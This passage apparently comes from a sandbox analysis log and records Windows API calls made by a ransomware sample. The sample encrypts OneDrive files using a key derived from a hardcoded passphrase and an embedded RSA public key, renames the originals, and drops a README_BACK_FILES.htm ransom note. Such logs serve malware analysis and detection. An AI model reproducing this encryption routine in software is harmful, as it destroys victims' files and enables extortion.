lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0275.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0275.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0275.758] CloseHandle (hObject=0x5d3c) returned 1 [0275.758] CloseHandle (hObject=0x5d48) returned 1 [0275.758] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0275.768] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0275.768] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0275.770] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0275.771] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0275.772] CryptDestroyKey (hKey=0x2fb688) returned 1 [0275.772] CryptReleaseContext (hProv=0x2f2a168, dwFlags=0x0) returned 1 [0275.772] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0275.772] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0275.772] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\readme_back_files.htm")) returned 0xffffffff [0275.772] AreFileApisANSI () returned 1 [0275.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0275.772] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0275.773] GetFileType (hFile=0x5d4c) returned 0x1 [0275.773] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0275.774] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.774] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.775] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.775] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.775] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.775] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.786] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.786] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.786] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.786] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.786] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.787] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.787] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.787] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0275.787] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.787] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.787] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0275.787] GetLastError () returned 0x0 [0275.787] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui")) returned 0x20 [0275.791] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0275.791] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0275.792] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0275.794] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0275.794] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0275.798] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0275.798] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0275.798] CryptHashData (hHash=0x2fa748, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0275.798] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb548) returned 1 [0275.798] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0275.798] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0275.798] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2aaf8) returned 1 [0275.799] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2aaf8, dwCertEncodingType=0x1, pInfo=0x2f33c90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33cc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33cc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb5c8) returned 1 [0275.799] CryptEncrypt (in: hKey=0x2fb5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0275.799] CryptEncrypt (in: hKey=0x2fb5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a168*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a168*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0275.799] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2a168*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a168*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0275.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.814] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.821] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.822] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.822] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 